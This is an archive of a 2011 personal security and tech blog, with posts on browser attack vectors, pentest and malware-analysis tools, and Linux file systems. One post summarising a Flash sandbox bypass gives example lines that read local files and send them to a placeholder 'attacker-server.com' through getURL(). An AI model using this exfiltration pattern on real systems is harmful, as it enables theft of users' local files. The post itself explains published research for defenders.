Wednesday, January 26, 2011

Three Web Attack Vectors Using the Browser

Very interesting article on Three Web Attack Vectors Using the Browser: "
Three web attack vectors seem to be responsible for the majority of computer attacks that involve a web browser:
  • The attack can incorporate an element of social engineering to persuade the victim to take an action that compromises security. For instance, the victim can supply data to a phishing site or install a program that will turn out to be malicious.
  • The attacker can use the browser as a gateway for attacking web applications via techniques such as cross-site scripting (XSS), Cross-Site Request Forgery (CSRF) and Clickjacking.
  • The attacker can exploit a vulnerability in the web browser or in local software that the browser can invoke. Such client-side exploits have targeted browser add-ons such as Flash, Adobe Reader and Java Runtime Environment (JRE).
Most attacks include one or two of the three techniques. For instance, Koobface worm targets the user (social engineering to click links) and the web application (hijacking social networking site sessions). An attack that combines all elements would be particularly effective (do you know of any examples?).





The following series of posts explores these three web browser attack vectors in greater detail, discussing how enterprises can protect themselves against such attacks:
Lenny Zeltser


Monday, January 24, 2011

Attack Surface Analyzer BETA

The Attack Surface Analyzer beta is a Microsoft verification tool now available free for everyone to highlight the changes in system state, runtime parameters and securable objects on the Windows operating system. This analysis helps developers, testers and IT professionals identify the attack surface caused by installing applications on a machine.


Attack Surface Analyzer takes a snapshot of your system state before and after the installation of product(s) and displays the changes to a number of key elements of the Windows attack surface. The tool takes snapshots of an organization's system and compares ("diffing") these to identify changes. The tool does not analyze a system based on signatures or known vulnerabilities; instead, it looks for classes of security weaknesses as applications are installed on the Windows operating system.

The tool also gives an overview of the changes to the system Microsoft considers important to the security of the platform and highlights these in the attack surface report. The Microsoft Security Development Lifecycle (SDL) requires development teams to define a given product's default and maximum attack surface during the design phase to reduce the likelihood of exploitation wherever possible. Additional information can be found in the Measuring Relative Attack Surface paper.

Some of the checks performed by the tool include analysis of changed or newly added files, registry keys, services, ActiveX Controls, listening ports, access control lists and other parameters that affect a computer's attack surface.


Download the free tool (x64 and x86) at http://www.microsoft.com/downloads/en/details.aspx?FamilyID=e068c224-9d6d-4bf4-aab8-f7352a5e7d45&displaylang=en

Related article:


Sunday, January 23, 2011

Inguma – The Penetration Testing & Vulnerability Research Toolkit

Inguma is a penetration testing toolkit entirely written in python. The framework includes modules to discover hosts, gather information about, fuzz targets, brute force user names and passwords and, of course, exploits. This program provides numerous tools for information gathering, target auditing and limited exploitation capabilities.

There are some good docs to get you up at their wiki site: Installation Guide, Getting Started, Console Quick Start, GUI Quick Start, Full Documentation. Follow them at Inguma Development.

Download it at http://code.google.com/p/inguma/

Saturday, January 22, 2011

Google Code University

Learn programming at Google Code University. It does not require registration and materials are free to use.

Monday, January 17, 2011

Switch Between Multiple Gmail Accounts With a URL Hack [URL Hacks]

Switch Between Multiple Gmail Accounts With a URL Hack [URL Hacks]: "

Switch Between Multiple Gmail Accounts With a URL HackWe were pretty stoked when Google debuted its multiple account sign-in feature, and reader Sam has discovered a way to switch between accounts faster using a small URL tweak.

I was flipping between two Gmail account tabs using Google's multiple logins feature, and I noticed that the two URLs are almost identical: https://mail.google.com/mail/u/0/#inbox and https://mail.google.com/mail/u/1/#inbox. It turns out that switching between the 0 and 1 (and presumably higher numbers if there are more than 2 accounts logged in) switches accounts. In particular, since there is no keyboard shortcut for switching between accounts, editing the URL may be the fastest way to do so using only the keyboard.


In fact, the fastest way to switch between them using only the keyboard would be to bookmark the sites and create address bar keywords for them, so you can flip back and forth using just a few keystrokes instead of having to use your mouse. Thanks, Sam!


Saturday, January 15, 2011

REMnux Version 2.0 is released

REMnux is a lightweight Linux distribution for assisting malware analysts in reverse-engineering malicious software. REMnux version 2 was released few days back.

Download the new version of REMnux from its main page as a virtual appliance and/or as a Live CD. Here're the quick highlight of the tools it supports.

Malicious Websites Analysis:
  • Updated version of Jsunpack-n (proxy support, encrypted PDF handling)
  • Includes Stunnel (for interception of SSL sessions)
  • Includes RABCDAsm toolkit for RE malicious Flash (SWF) programs.
  • Includes tor and torsocks (for anonymizing interactions with suspicious websites)
  • Includes Burp Suite Free Edition.

Memory Forensics:
  • Updated Volatility memory forensics framework to version 1.4 RC 1 (support Vista and 7). 
  • Includes AESKeyFinder and RSAKeyFinder tools (for finding AES and RSA keys in a memory image).

Others:
  • Includes pyOLEScanner.py (for analysis of malicious Microsoft Office documents).
  • Includes libemu library to obtain the “sctest” tool (for shellcode analysis).
  • Added the “whois” utility.
  • Added xortools.py and pescanner.py tools (from Malware Analyst’s Cookbook).
  • Installed VBinDiff for viewing and comparing files.
  • Installed ircII to supplement the Irssi IRC client.
  • Added the VirusTotal VTzilla Firefox extension.
  • Added md5deep to assist with hash calculating-operations.
  • Added ClamAV for manually scanning suspicious files and generating signatures.

Thursday, January 13, 2011

Unpatch Microsoft Vulnerabilities

I saw this this morning on the risk currently being tracked by MSRC at http://blogs.technet.com/b/srd/archive/2011/01/07/assessing-the-risk-of-public-issues-currently-being-tracked-by-the-msrc.aspx

However, there is a longer list of unpatch Microsoft vulnerabilities at VUPEN Security. Any 0day there?

Notmyfault Colors Your BSOD

Remember Make Simple Things Difficult? There is a new tool from sysinternal to customized the color of BSOD for you easily.

Goto "Blue Screen" in Designers Colors with in One Click.

Replace OpenOffice with LibreOffice

The development on OpenOffice has been slowing down since the acquisition by Oracle. It is time to look for a replacement.

Today, I found this, called LibreOffice. It is available for Linux (x86 and 64 bit), Mac OS X, and Windows. Most importantly, it supports docx format natively.

Google Chrome to Drop Support for H.264

Google Chrome to Drop Support for H.264: "Chromium's blog informs that Google Chrome will drop support for H.264 in the coming months and will only support WebM (VP8) and Theora codecs.
We expect even more rapid innovation in the web media platform in the coming year and are focusing our investments in those technologies that are developed and licensed based on open web principles. To that end, we are changing Chrome's HTML5 <video> support to make it consistent with the codecs already supported by the open Chromium project. Specifically, we are supporting the WebM (VP8) and Theora video codecs, and will consider adding support for other high-quality open codecs in the future. Though H.264 plays an important role in video, as our goal is to enable open innovation, support for the codec will be removed and our resources directed towards completely open codec technologies.

Google decided to pick sides, much like Mozilla and Opera, in an effort to encourage developers to use WebM. Right now, the only important website that uses WebM is YouTube, Google's video sharing service. Internet Explorer, Safari and iOS devices are unlikely to support WebM, while hardware acceleration and Flash support are expected later this year.

John Gruber thinks that 'this is just going to push publishers toward forcing Chrome users to use Flash for video playback — and that the video that gets sent to Flash Player will be encoded as H.264'. He also finds it ironic that Google Chrome bundles Adobe's proprietary Flash plugin, which is a great software for playing H.264 videos.

VP8 has a long way to go before becoming the codec of choice for Web videos and Google decided to make it more popular by dropping support for the competing codec from its browser. Last year, Andy Rubin said that sometimes being open 'means not being militant about the things consumer are actually enjoying,' but that's not the case here.


Thursday, January 06, 2011

GREM Certificate

Thanks a lot, I received my GREM certificate from SANS today. ;-)

Bypassing Flash Local-with-filesystem Sandbox

Background:
  • Flash is designed around the sandbox concept.
  • Flash cannot read local files except for the cookie files.
What Billy Rios did recently in his research:
  • Bypass the restriction and make flash to access any local and remote files.
  • Found a protocol handler that wasn't blacklisted by Adobe.
  • User will not be prompted for permission when bypassing attempts.
Summary of how it works:
  • Using file:// and point to local system. Eg: file://\\192.168.1.1\stolen-data-here\
  • Then pass the content back to attacker server via getURL(). Eg: getURL(‘mhtml:http://attacker-server.com/stolen-data-here‘, ”);
References:

Monday, January 03, 2011

Which Linux File System Should You Choose?

Just finish reading an article explaining about latest Linux file system. It has been quite some time that not follow up with Linux file system. And this article is a good memory refresh for me.

Here are some great points for me (from the article):

  • Compare to ext2/ext3, ext4 is better for SSD and general performance.
  • BtrFS makes great for servers due to it's features on performance, snapshot, transparent compression, and online defragmentation.
  • ReiserFS is great for small files (log), database and email servers.
  • XFS only works great for large file that requires constant throughput  (media files).
  • JFS works great for both small and large files, with very low CPU usage.
  • ZFS, an advanced file system that shows great performance in large disk arrays, supports drive pooling, snapshots, and dynamic disk striping.


>>>> http://www.howtogeek.com/howto/33552/htg-explains-which-linux-file-system-should-you-choose/

HTG Explains: Which Linux File System Should You Choose?

File systems are one of the layers beneath your operating system that you don’t think about—unless you’re faced with the plethora of options in Linux. Here’s how to make an educated decision on which file system to use.
The landscape of the Linux file system support is drastically different from Windows and OS X. In Windows and OS X you can find software that will add support for non-standard file systems, but both operating systems can only be installed on their native file system and third party support is added after the fact.
Linux on the other hand has a vast array of supported file systems built into the kernel. But how are you supposed to know which file system to pick when installing? We will take a look at some of the most popular choices available and give you use cases to consider—the choice is ultimately up to you based on your needs.

Image by DijutalTim

What is Journaling?

Before we go to far down the rabbit hole talking about options, we need to first take a quick look at journaling. The only real thing you need to know about journaling is that every modern file system uses journaling in some form or another and on any desktop or laptop you are setting up with Linux you will want to use a journaling file system.
Journaling is only used when writing to a disk and it acts as a sort of punch clock for all writes. This fixes the problem of disk corruption when things are written to the hard drive and then the computer crashes or power is lost. Without a journal the operating system would have no way to know if the file was completely written to disk.
With a journal the file is first written to the journal, punch-in, and then the journal writes the file to disk when ready. Once it has successfully written to the disk, it is removed from the journal, punch-out, and the operation is complete. If power is lost while being written to disk the file system can check the journal for all operations that have not yet been completed and remember where it left off.
The biggest downside to journaling is that it sacrifices some performance in exchange for stability. There is more overhead to write a file to disk but file systems get around this overhead by not writing the full file to the journal. Instead only the file metadata, inode, or disk location is recorded before actually being written to disk.

File System Options

As we look at some of the major file systems available to Linux we are going to touch briefly on each one and give a couple suggestions for when you may or may not want to use the file system based on features. This in no way means these file systems cannot be used in other cases, these suggestions are just areas where each file system will excel.
Ext stands for Extended file system and was the first created specifically for Linux. It has had four revisions and each one has added fairly significant features. The first version of Ext was a major upgrade from the Minix file system used at the time, but it lacks major features used in today’s computing.
  • At this time you probably should not use Ext in any machine due to its limitation and age. It also is no longer supported in many distributions.
Ext2 is not a journaling file system, and when introduced was the first to allow for extended file attributes and 2 terabyte drives. Because Ext2 does not use a journal it has significantly less writes applied to the disk.
  • Due to lower write requirements, and hence lower erases, it is ideal for flash memory especially on USB flash drives.
  • Modern SSDs have a increased life span and additional features that can negate the need for using a non-journaling file systems.
Ext3 is basically just Ext2 with journaling. The aim of Ext3 was to be backwards compatible with Ext2 and therefore disks can be converted between the two without needing to format the drive. The problem with keeping compatibility is many of the limitations of Ext2 still exist in Ext3. The benefit of keeping backwards compatibility is the fact that most of the testing, bug fixes, and use cases for Ext2 also apply to Ext3 making it stable and fast.
  • Use if you need to upgrade a previous Ext2 file system to have journaling.
  • You will probably get the best database performance from Ext3 due to years of optimizations.
  • Not the best choice for file servers because it lacks disk snapshots and file recovery is very difficult if deleted.
Ext4, just like Ext3 before it, keeps backwards compatibility with its predecessors. As a matter of fact, you can mount Ext2 and Ext3 as an Ext4 file system in Linux and that alone can increase performance under certain conditions. You can also mount an Ext4 file system as Ext3 without ill effects.
Ext4 reduces file fragmentation, allows for larger volumes and files, and employs delayed allocation which helps with flash memory life as well as fragmentation. Although it is used in other file systems, delayed allocation has potential for data loss and has come under some scrutiny.
  • A better choice for SSDs than Ext3 and improves on general performance over both previous Ext versions. If this is your distro’s default supported file system, you should probably stick with it for any desktop or laptop you set up.
  • It also shows promising performance numbers for database servers, but hasn’t been around as long as Ext3.
BtrFS, pronounced “Butter” or “Better” FS, is being  developed by Oracle and contains similar features found in ReiserFS. It stants for B-Tree File System and allows for drive pooling, on the fly snapshots, transparent compression, and online defragmentation.  It is being specifically designed for enterprises but most every consumer distro has plans to move to it as the default file system eventually.
Although it’s not stable in some distros, it will eventually be the default replacement for Ext4 and currently offers on-the-fly conversion from Ext3/4. It is also key to note that the principle developer for ext3/4, Theodore Ts’o, has said that BtrFS is the “way forward”.
  • BtrFS makes a great server file system due to it’s performance, snapshots, and many other features.
  • Oracle is also working on a replacement for NFS and CIFS called CRFS which boasts better performance and more features. Making it the best choice for a file server.
  • The performance tests have shown it to lag behind Ext4 on flash memory such as SSDs, as a database server, and even certain cases of general system read/writes.
  • Ubuntu 10.10 only allows you to install BtrFS if you use the text base alternate install CD and your /boot partition still requires an Ext file system.
ReiserFS was a big leap forward for Linux file systems when it was introduced in 2001 and it included many new features that Ext would never be able to implement. ReiserFS was replaced by Reiser4 in 2004 which improved on many of the features that were incomplete or lacking in the initial release. However Reiser4 development is very slow and it still does not have support in the main Linux kernel. ReiserFS is the only version currently available in many distributions.
  • Has great performance for small files such as logs and is suited for databases and email servers.
  • ReiserFS can be dynamically expanded but not shrunk and does not support FS level encryption.
  • The future of Reiser4 is questionable and BtrFS is probably a better choice.
XFS was developed by Silicon Graphics in 1994 for their own operating system and was later ported to Linux in 2001. It is comparable to Ext4 is some regards because it also uses delayed allocation to help with file fragmentation and does not allow for mounted snapshots. XFS has shown itself to provide good performance with large files and has the ability to be resized, however you are not able to shrink an XFS volume.
  • Good for a media file server because of constant throughput for large files.
  • Most distributions require separate /boot partition because XFS and GRUB can be unpredictable
  • Performance with small files is not as good as other file systems making it a poor choice for databases, email, and other servers that have a lot of logs.
  • Not as well supported as Ext for personal computers and doesn’t have significant performance improvements or features over Ext3/4.
JFS was developed by IBM in 1990 and later ported to Linux. It boasts low CPU usage and good performance for both large and small files. JFS partitions can be dynamically resized but not shrunk like ReiserFS and XFS. It was extremely well planned and has support in most every major distribution, however its production testing on Linux servers isn’t as extensive as Ext as it was designed for AIX.
  • Good performance for both large and small files and because of its low CPU usage is probably best for low powered servers and computers
  • It does not have built in tools for drive pooling so it may not be as expandable as something like BtrFS but a netbook with only 1 hard drive may be a good option
  • It also has fast disk checking compared to Ext but there have been some reports of disk corruption after long term use.
ZFS is worth a mention because it is also be being developed by Oracle and has similar features to Btrfs and ReiserFS. It was in the news in recent years when Apple was rumored to move to it as their default file system. Due to its licensing, Sun CDDL, it is not compatible to be included in the Linux kernel. It does however have support through Linux’s Filesystem in Userspace (FUSE) which makes using ZFS possible.
  • Shows great performance in large disk arrays.
  • Supports a lot of advanced features including drive pooling, snapshots, and dynamic disk striping.
  • It may be difficult to install in Linux because it requires FUSE and might not be supported by your distribution.
Swap isn’t actually a file system. It is used as virtual memory and doesn’t have a file system structure. It cannot be mounted and read but is only used by the kernel to write memory pages to disk. It is typically only used when you either run out of physical memory or when you put your computer in hibernate but it is important to know what your partitioning tools mean when it asks for a swap space.
To learn even more you can check out the Wikipedia page on comparison of file systems.

So Which One Should You Choose?

For a general use case on your laptop or desktop, you’ll probably want to stick with ext4 (if your distro uses it as the default), since it’s a modern file system that’s supported in most distributions—but if you’ve got a specific need, now you have more information to make your decision.

So now that you understand the differences between the file systems, which one would you choose?

Sunday, January 02, 2011

HTG Explains What is the Linux fstab

A lot of people don't know that Linux /etc/fstab stands for 'file system table'. And not many people are comfortable to modify the configuration of it.

  • Do you know why it starts with UUID?
  • Do you know you can mount NTFS partition with ntfs-3g driver?
  • How about the options? auto/noauto? exec/noexec? ro/rw? sync/async? user/nouser?
  • Do you know that "user" option automatically implies "exec"?
  • What are dumping and pass?
Some of the minor settings are really new to me. For example, "sync" forces writing to occur immediately on execution of the command, which ideal for floppies and USB drives, but isn't entirely necessary for internal hard disk. What "async" does is allow the command to execute over an elapsed time period, perhaps when user activity dies down and the like. This is usually why you ever get a message asking you to "wait while changes are being written to the drive".


Compile & Install TAR GZ & TAR BZ2 Files

The is the short instruction on how to compile and install from a .TAR.GZ or TAR.BZ2 file. Ensuring this is done properly will provide a nice clean way to remove the software afterwards via your package manager.

Preparing your system:

  • sudo apt-get install build-essential checkinstall
  • sudo apt-get install subversion git-core mercurial
  • sudo mkdir /usr/local/src
  • sudo chown $USER /usr/local/src
  • sudo apt-get install apt-file
  • sudo apt-file update

Extract and configure:
  • cd /usr/local/src
  • tar -zxvf .tar.gz
  • [ or ] tar -jxvf .tar.bz2
  • cd /usr/local/src/
  • ./configure
  • [ optional ] sudo apt-get install autoconf
  • [ optional ] apt-file search .
  • [ optional ] sudo apt-get install  

Build & Install:
  • make
  • sudo checkinstall
  • [ add description accordingly ]